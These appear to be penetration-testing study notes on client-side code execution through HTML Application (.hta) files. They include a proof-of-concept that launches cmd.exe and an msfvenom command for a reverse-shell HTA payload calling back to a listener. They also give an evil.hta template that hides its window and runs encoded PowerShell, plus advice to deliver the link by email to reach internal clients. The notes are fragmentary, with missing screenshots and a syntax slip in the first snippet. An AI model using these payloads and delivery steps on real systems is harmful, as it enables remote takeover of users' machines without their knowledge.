In this example, we will leverage ActiveXObjects, which can potentially (and dangerously) provide access to underlying operating system commands. This can be achieved through the Windows Script Host functionality or WScript and in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its run method in order to launch an application on the target client machine.

--------------------poc.hta--------------------

var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c);self.close();

We can save this and serve it with apache. This will open cmd on the users computer. The user will be prompted with:

then if they click to open it they will get:

This second message is when the internet explorer sandbox “Protected Mode” is turned on (default). mshta.exe also will have its own cmd prompt open which is why we close it after we launch our window/process RCE: $ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta //this format is hta-2-powershell -nop , is shorthand for -NoProfile , which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user’s profile scripts, which might negatively impact the execution of our code. -w hidden (shorthand for -WindowStyle hidden ) -e flag (shorthand for -EncodedCommand ) allows us to supply a Base64 encoded PowerShell script directly as a command line argument.

----------------- evil.hta----------------- <html> <head> <script language="VBScript"> window.moveTo -4000, -4000 Set iKqr8BWFyuiK = CreateObject("Wscript.Shell") Set t6tI2tnp = CreateObject("Scripting.FileSystemObject") For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";") If t6tI2tnp.FileExists(path + "\..\powershell.exe") Then iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT_YOUR_BASE64_ENCODED_COMMAND_HERE </script> </head> <body> <script> self.close(); </script> </body> </html> -----------------------Then open a listener and wait for the user to trigger it -----------------

Since the link to the HTML Application can be delivered via email, we can even compromise NAT’d internal clients.